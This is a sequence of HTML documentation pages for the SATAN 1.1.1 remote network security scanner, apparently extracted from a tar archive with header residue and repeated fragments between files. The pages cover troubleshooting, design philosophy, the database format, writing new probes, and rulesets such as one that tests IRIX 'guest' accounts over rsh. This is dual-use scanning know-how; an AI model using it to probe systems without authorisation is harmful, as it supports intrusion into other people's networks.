bogus! Give me my money back!</h3></a> Calm down. You probably can't use ICMP to detect if a host is alive or not. Try setting "$dont_use_ping=1" in <i>config/satan.cf</i> (it's near the bottom.) It should work, or we'll give you double your money back. <p> <a name="crash"><H3>SATAN crashed, hung, or did very odd things to a system that it was run against.</H3></a> We've received reports of various OS's that seem to have significant trouble with SATAN scans, particularily the UDP and TCP scans that span lots of ports. Among the afflicted: <ul> <li>DEC Alphas running OSF/1 1.3 - generates a kernal memory fault when the UDP scan is done, rolls over and dies. The file system is sufficiently hosed such that the system remains in single user mode upon reboot. <li>A few Mac's had ethernet problems, spewing packets back at the SATAN machine when fping-ed, causing the SATAN host to slow down tremendously trying to handle the traffic. <li>OS/2, version 3.0 of the networking code. A report that it locked up the telnet and ftp daemons. A restart of inetd is required to get things going again. <li>Ultrix systems running 4.2A - the elcsd process start to loop, consuming all available CPU cycles. <li>SunOS 5.4 - an extra inetd process is forked off, adding 1.0 to the system load. </ul> <p> <a name="crash-n-burn"><H3>I ran SATAN to analyze my results and the machine slows grinds down to a standstill (and possibly crashes), but I don't get any answers.</H3></a> It could be, with a large amount of data, that SATAN is using too much memory to fit in your machine. An enormous amount of memory is consumed by the program (see <a href="system_requirements.html#memory>memory requirements</a> for more on this.) Try checking the memory used by SATAN on your machine; if it needs more, get more memory - adding swap space is a very painful way of trying to deal with this. <p> <a name="broken-dns"><H3> Given that Satan starts its own http server on the local host, why doesn't it use 'localhost' instead of the FQDN of the local host when trying to contact it?</H3></a> This breaks some HTML browsers. Try running with $dont_use_nslookup (found in config/satan.cf) when your naming service is crippled. <p> <a name="proxy"><H3>Whenever I click on a hyper link it doesn't work.</H3></a> Be careful if you use proxy services (typically if you're behind a firewall you do) to access the WWW - you should unset environment variables (such as $http_proxy $file_proxy, $socks_ns, etc.) and/or change your browser's configuration to not use your SOCKS host or HTTP Proxy host (in your HTML browser's option section.) <p> <a name="merge"><h3>I merged some databases together with the "merge" function in the <i>SATAN Data Management</i>, but when I exited SATAN, they weren't saved. What gives?</h3></a> The database merging only works in memory. Currently there is no way to save this to disk (until the next version of SATAN.) <p> <a name="processes"><h3>I get "bin/tcp_scan: socket: Too many open files" in the window from which I start Satan.</h3></a> The machine's open file table is getting exhausted. Tcp_scan backs off and succeeds after a few attempts. You'll need to build a bigger kernel or run less processes. <p> <a name="linux"><H3>I'm trying to get SATAN running on my Linux box.</H3></a> Linux is far from a standard Un*x, and SATAN has a tendency to push the OS and perl to the limits. We've tried to do as much as possible to make it work, but there are probably various problems we haven't found because we don't have a Linux box to play with. (Cross?) posting to comp.security.unix and comp.os.linux.* could probably give you more help than we could. <p> <a name="warning-sites"> <H3>Why doesn't it warn remote hosts that it is probing them?</H3></a> This could be built into satan; the most reliable general solution would be to send mail to the probed system (say, to "root" or "postmaster"). A beta-tester suggested that an entry could be written to the target's syslog. Neither of the solutions are incredibly reliable. The former relies on someone reading the mail and the account existing, as well as having to deal with hundreds if not thousands of pieces of mail that might go to machines that the user of SATAN controls. The latter has several problems, first and foremost in that it depends on people actually looking at the syslog records, and secondly that if an intruder uses SATAN to break in, they will typically "flatten", modify, or simply destroy such records. Finally, many systems don't run or have non-standard syslog programs and quite a few filter out requests with packet filters, so they would never see the warning. <p> Nonetheless, we'll probably be putting either or both of these as options in the next release of SATAN. <p> <a name="satan-n-cops"><H3>What's the difference between it and COPS?</H3></a> COPS is a host-based Un*x security auditing tool; that means you run it on the host you wish to examine the security of. SATAN is a remote <STRONG>network</STRONG> security auditing tool, which means it can report on the security of any host OR network that has IP connectivity to where you run the tool; you don't need an account or privileges on the remote targets to report on them. <p> <a name="satan-n-iss"><H3>What's the difference between it and ISS and other remote scanners?</H3></a> ISS, and any other remote auditing tool that we're aware of, scans a network or remote host and then reports on any problems that it may find. While SATAN does that as well, the inferencing, the web of trust that it uncovers, the automatic probing of secondary targets, the rich reporting schema with context sensitive hypertext links to the documentation, the rich configurability, etc. all make SATAN different to what is currently available. <p> <a name="remote-audit"><H3>What's a remote security auditing tool/probe/scanner?</H3></a> This means it can report on the security of any host OR network that has IP connectivity to where you run the tool; you don't need an account or privileges on the remote targets to report on them. <p> <a name="black-n-white"><H3>I'm using a B/W monitor, and it's hard to see the difference between red and black dots. What can I do?</H3></a> The easiest thing to do is to just mv (or link or whatever) the <i>html/dots/whitedot.gif</i> to <i>html/dots/reddot.gif</i>. That'll give a much higher contrast and should be easier to read. <p> <a name="www"><H3>How can I change from one HTML browser (e.g. Mosaic, Netscape, whatever) to another, without running reconfig or something?</H3></a> Simply edit the file <i>config/paths.pl</i>. You'll see a line that looks like: <PRE> $MOSAIC = "/usr/local/bin/netscape"; </PRE> Change the path inside the parenthesis to point to wherever your preferred browser is; for instance, if you want to use Mosaic, and it's in <i>/usr/bin/X11</i>, you'd change the above line to: <PRE> $MOSAIC = "/usr/bin/X11/Mosaic"; </PRE> <p> <a name="multi-fingers"><H3>Why does SATAN keep fingering the same host(s) over and over again?</H3></a> SATAN will finger a host repeatedly if it gets new information about the host; for instance, if it finds out that a user might exist on a host, it will finger to try and find out remote login information. <p> <a name="died"> <H3>SATAN died (or the machine crashed, or whatever) in the middle of a run - do I have to start everything over again?</H3></a> SATAN saves data at regular intervals to its database files; the easiest thing to do is to simply start it up again, with the same target and probe levels. If SATAN has remembered anything, it will grind away for awhile, finding out what it has seen before, and then resume on the targets that it hasn't scanned. <p> <a name="how-detect"><H3>How can I tell if anyone is running SATAN against me?</H3></a> CIAC wrote and is distrbuting something called <a href="http://ciac.llnl.gov/ciac/ToolsUnixNetMon.html#Courtney"> Courtney</a>, but it is far from foolproof. It is very difficult to detect the lighter SATAN scans; the heavier ones, however, are typically best detected by running Wietse's tcpd wrappers and examining the logs - a good tipoff is if many of your machines in the same area log connections from the same remote site. Some of the SATAN probes output a message to the console - if users report odd messages on their console screen, take them seriously ;-) <p> <a name="different-os"><H3>{When is the port of/can you help me port/do you have any information on porting} SATAN to MacOS/DOS/VMS/MVS/Whatever?</H3></a> SATAN, at least on the server side, is heavily linked to Un*x and perl5. While it might be possible to port SATAN to one of these other OS's (if you can call them that! ;-)) would be fairly difficult and not something that either one of us wants to touch with a ten foot (or ~ 3 meter) pole. <p> <a name="tmp-files"><H3>I see a lot of odd files that are appearing on my system after running SATAN, such as /tmp/sh11318, tmp_file.1288, etc. What's the deal?</H3></a> SATAN uses perl extensively in it's tests; the <i>.satan</i> probes use such commands as: <pre> open(FOO, "|program <<_EOF some input more input _EOF"); </pre> This will leave a temporary file behind when SATAN determines that they have run out of time and kill off the probe. Almost all temporary files that are created at various time within the SATAN are deleted automatically, but since the << files are created internally by the shell, it is impossible for SATAN to know how to delete the files that remain. Simply delete them, or create a <i>cron</i> job to automatically sweep the <i>/tmp</i> directory for you. <p> <a name="bug-check"><H3>Why doesn't SATAN check for [insert your favorite bug here]?</H3></a> There are several reasons why SATAN does not probe for all known bugs: <UL> <LI>Pointing out bugs is one thing, but fixing them is not always possible. With the first release, SATAN focuses on problems that can be fixed or worked around by the system administrator, at least when the operating system version is reasonably up to date. <LI>The authors have only a few hours in the day available for SATAN development, and writing the data collection tools wasn't nearly as much fun as building the SATAN framework that controls them. <li>Many bugs are *extremely* difficult to check for, especially when you're dealing with code that has to return a yes or no in a very short time over potentially thousands of hosts. </UL> <hr> <p> <a href="../satan_documentation.html"> Back to the Documentation TOC</a> </BODY> </HTML> saic, Netscape,satan-1.1.1/html/docs/philosophy.html............................................................... 600 . 465 . 506 . 5255 5737563033 12673. ............................................................................................ ................................................................................................................................................................................................................................................................. .......<HTML> <HEAD> <title>Philosophical Musings</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Philosophical Musings</H1> <HR> <A NAME="why-build"><H3>Why build it?</H3></A> Why did we create SATAN? Quite simply, we wanted to know more about network security, particularly with respect to large networks. There is an enormous amount of information out there, and it is definitely not clear by examining information and hosts by hand what the <I>real</I> overall security picture is. SATAN was an attempt to break new ground, to promote understanding, and to have fun writing such a program. <p> <A NAME="money"></a> <H3>Money, endorsements, recording contracts, etc.</H3> <p> For the record, no one gave us any money to build the tool; the development was done on our own time and equipment. No one (including our current employers) endorses or directly supports it. <p> <A NAME="why-scan"><H3>Why does it scan sites other than your own?</H3></A> All the hosts scanned with SATAN are done so because it gives a clearer picture of what the network security of your site is, by examining the webs of trust and the possible avenues of approach or attack. Since there is no way that SATAN could, a priori, know where it is going to scan, we decided that instead of placing artificial constraints on the program, we would allow the system administrator to place their own constraints on where SATAN would run, via the configuration file (<A HREF="satan.cf.html#exceptions"> targeting exceptions</A>.) <p> <A NAME="white-hats"><H3>Why wasn't there a limited distribution, to only the "white hats"?</H3></A> History has shown that attempts to limit distribution of most security information and tools has only made things worse. The "undesirable" elements of the computer world will obtain them no matter what you do, and people that have legitimate needs for the information are denied it because of the inherently arbitrary and unfair limitations that are set up when restricting access. <p> <A NAME="future"><H3>Future directions</H3></A> We're almost certainly going to continue development on SATAN. At the top of our wish list is a way to graphically display the network maps, especially with respect to the webs of trust. This is a hard problem! Our main goal right now is to get a solid product out, and see how it's received by the world; the response will drive our development. In addition, we haven't had much of a chance to play with the program ourselves, so once the dust clears, we'll probably have a better view of where we'll take the program. <hr> <a href="satan_overview.html"> Back to the Introductory TOC/Index</a> </BODY> </HTML> e avenues of approach or attack. Since there is no way that SATAN could, a priori, know where it is going to scan, we decided that instead of placing artificial constraints on the program, we would allow the system administrator to place their own constraints on where SATAN would run, via the configuration file (<A HREF="satan.cf.html#esatan-1.1.1/html/docs/satan.db.html................................................................. 600 . 465 . 506 . 12460 5740014467 12177. ............................................................................ ................................................................................................................................................................................................................................................................. .......................<HTML> <HEAD> <title>SATAN Database Format</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Database Format</H1> <HR> There are three main databases in SATAN: <UL> <LI><A HREF="#facts"><strong>facts</strong> - just the facts, m'am</a> <LI><A HREF="#all-hosts"><strong>all-hosts</strong> - all the hosts seen</A> <LI><A HREF="#todo"><strong>todo</strong> - all the things it did </a> </UL> <A name="facts"></a><H2>The "facts" database</H2> All information is in the form of text records with attributes described below; there are seven fields, each separated by a pipe ("|") character. <p> This information is what is collected by SATAN's dumb data collection tools - no intelligence used, they just do what they're told to do. <p> Inferences and conclusions are in the same format; the fields are: <OL> <LI> <A HREF="#Target">Target</A> <LI> <A HREF="#Service">Service</A> <LI> <A HREF="#Status">Status</A> <LI> <A HREF="#Severity">Severity</A> <LI> <A HREF="#Trusted">Trusted</A> <LI> <A HREF="#Trustee">Trustee</A> <LI> <A HREF="#Canonical">Canonical Service Output</A> <LI> <A HREF="#Text">Text</A> </OL> <A NAME="Target"><H3>Target</H3></A> Name of host that the record refers to. In order of preference, it uses FQDN, IP, estimated, or partial. Partial can result from service output getting truncated; e.g. finger can return <I>"foo.bar.co"</I>; is that <I>"foo.bar.com"</I>, or something longer? SATAN tries to figure this out, but obviously can't always be right. <A NAME="Service"><H3>Service</H3></A> The basename of tool, with the <I>".satan"</I> suffix removed. In the case of tools that probe multiple services (such as <em>rpcinfo</em> or the portscanner), the name of the service being probed. <A NAME="Status"><H3>Status</H3></A> This tells us if the host was reachable, if it timed out, or whatever. The codes and what they mean are: <OL> <LI><I>a</I>: <STRONG>available</STRONG> <LI><I>u</I>: <STRONG>unavailable (e.g. timeout)</STRONG> <LI><I>b</I>: <STRONG>bad (e.g. unable to resolve)</STRONG> <LI><I>x</I>: <STRONG>look into further?</STRONG> </OL> <A NAME="Severity"><H3>Severity</H3></A> How serious was the vulnerability? The codes are: <OL> <LI> <I>rs</I>: <STRONG>host</STRONG> or <STRONG>root</STRONG> access to the target. <LI> <I>us</I>: <STRONG>user shell access</STRONG> <LI> <I>ns</I>: <STRONG>nobody shell access</STRONG> <LI> <I>uw</I>: <STRONG>user file write</STRONG> <LI> <I>nr</I>: <STRONG>nobody file read</STRONG> </OL> <A NAME="Trustee"><H3>Trustee</H3></A> This is who trusts another target. It is denoted by two tokens separated by an at sign (<I>"@"</I>). The left part is the user : <OL> <LI> <I>user</I>: <STRONG> a particular user on the host is trusted</STRONG> <LI> <I>root</I>: <STRONG> only root is trusted</STRONG> <LI> <I>nobody</I>: <STRONG> user nobody on the host is trusted</STRONG> <LI> <I>ANY</I>: <STRONG> any arbitrary user on the host is trusted</STRONG> </OL> The right part of the trust field is the host that is trusted - it is either the <I>target</I> or <I>ANY</I>, which refers to any host on the Internet. <p> <A NAME="Trusted"><STRONG>Trusted</STRONG></A> This is who is the <I>trustee</I> trusts. It is denoted by two tokens separated by an at sign (<I>"@"</I>), and it uses the same format the the <A HREF="#Trustee"><I>"trustee"</I></A> field. <A NAME="Canonical"><H3>Canonical Service Output</H3></A> In the case of non-vulnerability records, this is a reformatted version of the network service; the format is either <I>"user name, home dir, last login"</I> or <I>"filesys, clients"</I>. In the case of vulnerability records, this is a description of the problem type. SATAN uses this name in reports by vulnerability type, and uses it to locate the corresponding vulnerability tutorial. <A NAME="Text"><H3>Text</H3></A> This is a place to put english (or other languages)-like messages that can be outputted in the final report. </OL> <A name="all-hosts"><H2>"all-hosts" - all the hosts seen database</h2></A> The <i>all-hosts</i> database keeps track of what hosts SATAN has seen, in any way, shape, or form, while scanning networks, including hosts that may or may not exist. (Non-existant hosts might include, for instance, hosts reported from the output of the <i>showmount</i> command. The database is an ASCII file, with six (6) fields separated by a pipe ("|") character, whose attributes are: <ul> <li>IP address of the host <li>The proximity level from the original target <li>The attack level the host has been probed with <li>Was subnet expansion on? (1 = yes, 0 = no) <li>What time was the scan done? </ul> (See the <a href="satan.cf.html">SATAN configuration file</a> documentation for more information on these variables and concepts.) <A name="todo"><H2>"todo" - database that tracks probes already done</h2></a> <p> The <i>todo</i> database keeps track of what probes have already been done. It's in the form of text records with attributes described below; there are three fields, each separated by a pipe ("|") character: <ul> <li>The hostname <li>The name of the tool that is to be run next <li>Any arguments for the tool </ul> The tools perform <i>.satan</i> probes against the <i>hostname</i> with the arguments, if any. <hr> <a href="satan_reference.html"> Back to the Reference TOC/Index</a> </BODY> </HTML> rote and is distrbuting something called <a href="http://ciac.llnl.gov/ciac/ToolsUnixNetMon.html#Courtney"> Courtney</a>, but it is far from foolproof. It is very difficult to detect the lighter SATAN scans;satan-1.1.1/html/docs/satan.probes.html............................................................. 600 . 465 . 506 . 6653 5737563542 13104. ................................................................... ................................................................................................................................................................................................................................................................. ................................<HTML> <HEAD> <title>Extending SATAN </title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Extending SATAN</H1> <HR> One of the best parts of SATAN is that it is so easy to modify, configure, and add your own probes and vulnerability checks to the system. All of the probes are files that end in <I>.satan</I> and are kept in the <i>bin</i> subdirectory; the rules to add new vulnerability checks are in the <I>rules</I> subdirectory (see the section on <a href="satan.rules.html">satan rules</a> for more information on the rulesets.) SATAN tests for vulnerabilities are roughly done as follows: <UL> <li> Initial data collection, via <i>.satan</i> files. Save this info into the database (ASCII text files). This will be either informational or vulnerability data. <li> When the user fires up the HTML browser, SATAN examines the database for explicit vulnerabilities, then checks the rulesets to see if it can infer other vulnerabilities (such as finding an old sendmail version or something.) </UL> If you want to add another <I>.satan</I> test - perhaps checking for the latest sendmail bug or something - there are a few things that must be done, depending on your test: <OL> <li> Create an executable that checks for the problem you'd like to scan for. It generally will take one argument - a hostname that is the target of the probe. <li> Have the probe output a valid SATAN output record - see the <A HREF="satan.db.html">SATAN database format</A> document for more on this. <li> If it is a C program or something that must be processed or compiled before being run, either modify an existing SATAN makefile to do so, or create your own. <li> Decide what severity level it will be run at; either <I>light</I>, <I>normal</I>, or <I>heavy</I>, and modify the appropriate variable in the <A HREF="satan.cf.html#attack-level">satan.cf</A> file. </OL> If you want to modify the rulesets, see the <a href="satan.rules.html">satan rules</a> section to see how to create a rule that will check for a vulnerability. <p> Finally, you'll want to create an information file (we call them tutorials.) This explains the vulnerability, tells how to fix or otherwise deal with the problem, points to applicable CERT or vendor advisories, etc. There are examples of these in the <i>html/tutorials/vulnerabilities</i> subdirectory. <p> <strong>Important!</strong> Look at the canonical output of the tool (see the <a href="satan.db.html#Canonical">satan database</a> for more details on this) - for instance, for REXD, it's <strong>"REXD access"</strong>. <p> The filename will be identical to the canonical output, with underbars <i>("_")</i> instead of spaces, with an <i>".html"</i> suffix. E.g., for REXD, the filename is <strong>REXD_access.html</strong>. <p> That's it! Place the executable (or have <I>make</I> do so after processing the source file) in the <i>bin</i> SATAN subdirectory with the rest of the <I>.satan</I> files. It will be run against any target that has an attack level that corresponds to your probe. <hr> If you're feeling really womanly or manly, and want to give your news tests or changes to the world, the best thing to do is to generate a patch using the diff command that can be run against the latest released version of SATAN. Feel free to send it to: <p> <ADDRESS>satan@fish.com</ADDRESS> <hr> <a href="satan_reference.html"> Back to the Reference TOC/Index</a> </BODY> </HTML> ut it is far from foolproof. It is very difficult to detect the lighter SATAN scans;satan-1.1.1/html/docs/satan.rules.html.............................................................. 600 . 465 . 506 . 17647 5737563420 12764. ................................................................... ................................................................................................................................................................................................................................................................. ................................<HTML> <HEAD> <title>SATAN Rulesets </title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Rulesets </H1> <HR> While not as potentially dangerous as the <a href="satan.cf.html">SATAN configuration file</a>, the collection of files that make up SATAN's internal rules are probably the most important part of the entire SATAN system. All inferencing is done here; this is how SATAN determines, for instance, what the target's OS and hardware type is from the other data collected in the system. Generally speaking, the rule files determine: <p> <UL> <li> What is dangerous/potentially harmful. <li> What is <STRONG>not</STRONG> dangerous. <li> What network services are being run. </UL> In addition, the rules also inform SATAN to run other probes based on past input; for instance, if the host is found to run <I>rexd</I>, then the <I>rexd.satan</I> probe might be run, based on a rule contained here. <p> The files are nothing more than perl code that gets run when the program initializes; don't be intimidated by that, however - it is fairly easy to read and is heavily commented (if you don't know perl, comments (lines that don't do anything) are lines that start with a sharp/pound sign ("#")). Variables are tokens that start with a dollar sign; values of 0 or null ("") typically mean false, unless otherwise noted. <p> There are currently six (6) rule files, each governing a separate part of SATAN's behavior (note: <I>facts</I> contain information that individual SATAN data collection modules (e.g. the ".satan" files) collect.) <OL> <li> <a href="#drop">rules/drop</a> - determines what facts should be ignored. <li> <a href="#facts">rules/facts </a> - deduces new facts from existing data. <li> <a href="#hosttype"> rules/hosttype </a> - tries to recognize host types from telnet/ftp/smtp banners. <li> <a href="#services">rules/services </a> - classifies hosts by service type. <li> <a href="#todo">rules/todo </a> - specifies what probes to try next, given information gathered so far. <li> <a href="#trust">rules/trust </a> - classifies trust relationships. </OL> The easiest way to explain all of this is to just go over each file in turn. <p> <a name="drop"> <H3>rules/drop</H3></a> This contains rules that determine what facts should be ignored. Each rule is applied once for each SATAN record that has an "a" in the status field (this means the host is available; see the <a href="satan.db.html#Status">SATAN Data Base Format</a> section.) <p> For instance, SATAN assumes that CD-ROM drives are not harmful for export purposes; if we see a target host that exports <I>/cdrom</I> or <I>/CDROM</I>, we assume it's harmless by telling SATAN to ignore this fact: <PRE> $text =~ /exports \/cdrom/i </PRE> (The <I>$text</I> variable holds the output of the SATAN probe, <I>showmount.satan</I> in this case; any of the global SATAN variables could be used.) <p> <a name="facts"><H3>rules/facts </H3></a> This file contains rules that deduce new facts from existing data. Each rule is executed once for each SATAN record that has an "a" in the status field. (this means the host is available; see the <a href="satan.db.html#Status">SATAN database format</a> section.) <p> The rule format is: <PRE> condition TAB fact </PRE> (Note - the <I>TAB</I> is the tab character, not the three letters "T", "A", and "B"!) <p> For example, if we want to assume that if a host is running rexd it's insecure without trying to probe it further, we would put: <PRE> /runs rexd/ $target|assert|a|us|ANY@$target|ANY@ANY|REXD access|rexd is vulnerable </PRE> The most difficult thing with the <I>rules/facts</I> file is that you have to understand the <a href="satan.db.html">SATAN data base format</a>; a good way to understand that better is to merely look at any of the <I>.satan</I> files in the main SATAN directory and look to see what the probe does and what it outputs. <p> <a name="hosttype"> <H3>rules/hosttype</H3> </a> This file contains rules that recognize host types from telnet/ftp/smtp banners; these are applied to every record that has a telnet, ftp, or sendmail banner. <p> The format of this file is: <PRE> CLASS class_name condition TAB hosttype </PRE> (Note - the <I>TAB</I> is the tab character, not the three letters "T", "A", and "B"!) <p> The class_name is used for the first rough breakdown by host type in reports. It should be a major software category, such as SUN, APOLLO, etc. For example, here is the code for recognizing a SUN and its major OS revision: <PRE> CLASS SUN UNKNOWN && /SunOS/ "SunOS 4" /4.1\/SMI-4.1/ "SunOS 4" /SMI-SVR4/ "SunOS 5" </PRE> <p> While it looks fairly impenetrable, look at the examples given if you'd like to create your own rules and steal and modify the code we use to do this. <p> <a name="services"> <H3>rules/services</H3> </a> Very similar to the <a href="#hosttype">host type</a> ruleset, this file contains rules that translate the cryptic SATAN record data to something that is more suitable for reports. Again, each rule is executed once for each SATAN record that has an "a" in the status field. (this means the host is available; see the <a href="satan.db.html#Status">SATAN database format</a> section.) <p> Format of this file is: <PRE> class_name condition TAB service_name TAB host </PRE> Where the class_name is <I>SERVERS</I> or <I>CLIENTS</I>. For instance, to classify a host as an NNTP server, you'd simply do this (in the <I>SERVERS</I> section): <PRE> $service eq "nntp" NNTP (Usenet news) </PRE> <p> <a name="todo"> <H3>rules/todo</H3> </a> These are rules that specify what probes to try next. Each rule is executed once for each SATAN record that has an "a" in the status field. (this means the host is available; see the <a href="satan.db.html#Status">SATAN database format</a> section.) <p> Format of this file is: <PRE> condition TAB target tool tool-arguments </PRE> (Note - the <I>TAB</I> is the tab character, not the three letters "T", "A", and "B"!) <p> The condition is a logical expression (with the usual internal SATAN variables) that has to be satisfied in order for SATAN to run the probe specified; when the condition is satisfied, the tool is executed as: <PRE> tool tool-arguments target </PRE> SATAN keeps track of already executed tool invocations. <p> For instance, if a host is running <I>ypserv</I>, we would typically run the <I>ypbind.satan</I> probe against it. This would be done as follows: <PRE> $service eq "ypserv" $target "ypbind.satan" </PRE> <p> It's easy to put in a probe that, say, depends on the type of system that you're looking at. For instance, SGI/IRIX hosts have <I>guest</I>, <I>lp</I>, and other accounts with no password when taken out-of-the-box from SGI. Here's how you could check to see if this is a problem: <PRE> /IRIX/ $target "rsh.satan" "-u guest" </PRE> That would do an rsh as user guest to see if a command could be executed remotely; SATAN would then record this fact in the results. <a name="trust"> <H3>rules/trust</H3> </a> Similar to the host and service type rules, SATAN uses the trust rules to translate the cryptic SATAN record data to something that is more suitable for reports. Again, each rule is executed once for each SATAN record that has an "a" in the status field. (this means the host is available; see the <a href="satan.db.html#Status">SATAN database format</a> section.) <p> Format of this file is: <PRE> condition TAB name of relationship </PRE> With the currrent <i>rules/trust</i> file, SATAN only begins to scratch the surface. It handles only the most easily detected forms of trust: <pre> $severity eq "l" remote login $text =~ /exports \S+ to/ file sharing $text =~ / mounts \S+/ file sharing </pre> <hr> <a href="satan_reference.html"> Back to the Reference TOC/Index</a> </BODY> </HTML> /hosttype</H3> </a> This file contains rules that recognize host types from telnet/ftp/smsatan-1.1.1/html/docs/user_interface.html........................................................... 600 . 465 . 506 . 37453 5741744536 13524. ................................ ................................................................................................................................................................................................................................................................. ...................................................................<HTML> <HEAD> <title>The SATAN User Interface</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">The SATAN User Interface</H1> <HR> SATAN was designed to have a very "user friendly" user interface. Since it is extremely difficult to create a good user interface from scratch, we stole everyone else's. All of the output (of the non-debugging sort) and nearly all of the interface uses HTML, so as a user you can utilize any number of incredible HTML display programs such as Netscape, Mosaic, lynx (for those stuck with text-only displays), etc. <p> Subsections in the User Interface section: <UL> <LI><A HREF="#basics">The Basics</A> <LI><A HREF="#data-mgmt">Data Management</A> <LI><A HREF="#gathering-data">Gathering Data</A> <LI><A HREF="#looking">Looking at and understanding the results</A> <LI><A HREF="#tricky-implications">Hints, Further tricky security implications, or Getting The Big Picture (tm)</A> <LI><A HREF="#command-line">The Command-line Interface</A> </UL> <hr> <p> <A NAME="basics"><H3>The Basics</H3></A> <STRONG>An HTML browser is REQUIRED to do report queries</STRONG>. It is highly suggested that you use it to read the documentation, if nothing else to print it out and read it via hard-copy, since it's also all in HTML (later versions of SATAN will almost certainly have non-HTML documentation, but the time pressures of the project eliminated this as a viable option for the first release of SATAN.) (While all of the program interface and documentation uses hypertext extensively; it's beyond the scope of this document to explain how to use a HTML browser, but all of them come with fairly extensive documentation and are very easy to use.) <p> This part of the documentation covers some of the basic design concepts and how to move around the SATAN user interface. However, <STRONG>with the exception of the <I>target acquisition</I> part of the program</STRONG> (we don't want you to learn how to probe hosts by trial and error!), the best way to learn how to use the program is to simply start pointing and clicking with your mouse or with the arrow keys on your keyboard. <p> <A NAME="data-mgmt"><H3>Data Management</H3></A> SATAN has a very simple way of opening or creating its databases (this is how SATAN keeps all of its records, including the hosts that it's seen (in the <I>all-hosts</I> file), the current set of facts (in the <I>facts</I> file), and what should be run next (<I>todo</I>) - see the <A HREF="satan.db.html">SATAN database description</A> if you'd like more information on those files. <p> All of SATAN's data collection output will go to the current set of databases, which are kept in the results directory in a subdirectory that has the current database name. A default database, called <i>satan-data</i> will be automatically created if no other name is chosen. <p> If you choose the <I>SATAN Data Management</I> from the <I>SATAN Control Panel</I>, you have three choices; open an existing set of data, start a new database, or to merge the contents of an on-disk database with the in-core data. <p> <STRONG>Note!</STRONG> Opening or creating a new database will destroy all other in-core information from other databases or scans. For this reason it is a good idea to choose a database <i>before</i> collecting data. All queries will go to the in-core database. New data collection results, etc. will go into the currently selected on-disk database. <p> Merging a database concatenates the contents of the chosen on-disk database to the in-core information. Although care must be taken to have enough physical memory to contain all the databases, SATAN becomes more and more interesting as more information is combined, because more correlation, trust, and patterns can be detected. In addition, when large databases from different but connected (users log in from one site to another, or important data is being shared) sites are placed together, <strong>better</strong> information can be gotten for both sites. If you know friendly neighboring system administrators, instead of asking for permission to scan their site, exchange your latest SATAN database with each other, and help each other out. It would be interesting to put together hundreds of thousands of hosts from the Internet and see what happens (although the memory and CPU speed required to process this amount of data would be formidable!) <p> <A NAME="gathering-data"><H3>Gathering Data</H3></A> Gathering information about hosts is very easy when using SATAN - too easy sometimes, because it follows lines of trust that are often hidden from casual observation, and you'll soon find it scanning networks and hosts that you had no idea were connected to your net. As an intellectual or learning exercise this is wonderful, but many sites take a dim view of you probing (or "attacking", as they'll claim) their site without prior permission. So don't do it. <p> The easiest and safest way to gather it is by simply selecting a target host that you'd like to know more about and then probe that host (and the subnet as well, if you wish) with the default settings: no host-to-subnet expansion, and a maximum proximity level of zero (see the <a href=satan.cf.html> config/satan.cf</a> (SATAN configuration) file for more on this.) <p> See the <a href="../tutorials/first_time/scanning.html"> tutorial</a> on how to scan a target for the first time. <p> <A NAME="looking"><H3>Looking at and understanding the results</H3></A> Easy to use, hard to describe. That's how the SATAN <I>Reporting and Analysis</I> works. There are three broad categories (vulnerabilities, information, and trust), each with fundamental differences in how they approach and analyze the data gathered from scanning. However, since so much information is tied together with the hypertext, you can start from any of these categories and find the same information but with a different emphasis or display on certain parts of the information. Most queries will present the user with an index that facilitates movement within that query type - the amount of information can get quite large - and a link that will lead the user back to the Table of Contents. In addition, vulnerabilities have links to a description of the problem, including what it is, what the implications are with respect to security, as well as how to fix it. If a CERT advisory applies to this particular problem then there is a link to that as well. <OL> <li><a href="#vulnerabilities"><STRONG>Vulnerabilities</STRONG></a>. This is what most people think of when they think of SATAN - what/where are the weak points of the host/network. <li><a href="#hostinfo"><STRONG>Host Information</STRONG></a>. Very valuable information - this can show where the servers are, what the important hosts are, breakdown the network into subnets, organizational domains, etc. In addition, you can query about any individual host here. <li><a href="#trust"><STRONG>Trust</STRONG></a>. SATAN can follow the web of trust between systems - trust through remote logins, trust by sharing file systems. </OL> <a name="vulnerabilities"><STRONG>Vulnerabilities</STRONG></a> <p> There are three basic ways of looking at the vulnerability results of your scan: <UL> <li>Approximate Danger Level. All of the probes generate a basic level of danger if they find a potential problem; this sorts all the problems by severity level (e.g. the most serious level compromises root on the target host, the least allows an unprivileged file to be remotely read.) <li>Type of Vulnerability. This simply shows all the types of vulnerabilities found in the probe, plus a corresponding list of hosts that fall under that vulnerability. <li>Vulnerability Count. This shows which hosts have the most problems, by sheer number of vulnerabilities found by the probe. </UL> Try looking at all of the different ways of looking at any vulnerabilities found by the probe to see which is most intuitive or informative to you; after using the tool for some time, it becomes easier to learn which type of query is the best for the current situation. <p> <a name="hostinfo"><STRONG>Host Information</STRONG></a> <p> An enormous amount of information can be gained by examining the various subcategories of this section - remember, the more intensive the SATAN probe, the more information will be gathered. Typically this will show either the numbers of hosts that fall under the specific category with hypertext links to more specific information about the hosts or the actual list of hosts (which can be sorted into different orders on the fly). If there is a host listed with a red dot (<IMG SRC="../dots/reddot.gif" ALT="*">) next to it, that means the host has a vulnerability that could compromise it. Note that if SATAN reports a problem, it means the problem is <strong>possibly</strong> present. The presence of Wietse's TCP wrapper, a packet filter, firewall, other security measures, or just incomplete information or assumptions may mean that what SATAN "sees" is not the real picture. A black dot (<IMG SRC="../dots/blackdot.gif" ALT="-">) means that no vulnerabilities have been found for that particular host yet. Note that a black dot next to the host does <strong>NOT</strong> mean that the host has no security holes. It only means that SATAN didn't find any; scanning at a higher level or additional probes might find some further information, and examining the SATAN database to see if probes were timing out rather than failing might mean the probes should be run a second time. Clicking on links will give you more information on that host, network, piece of information, or vulnerability, just as expected. <p> The categories are: <UL> <li>Class of Service. This shows the various network services that the collected group of probed 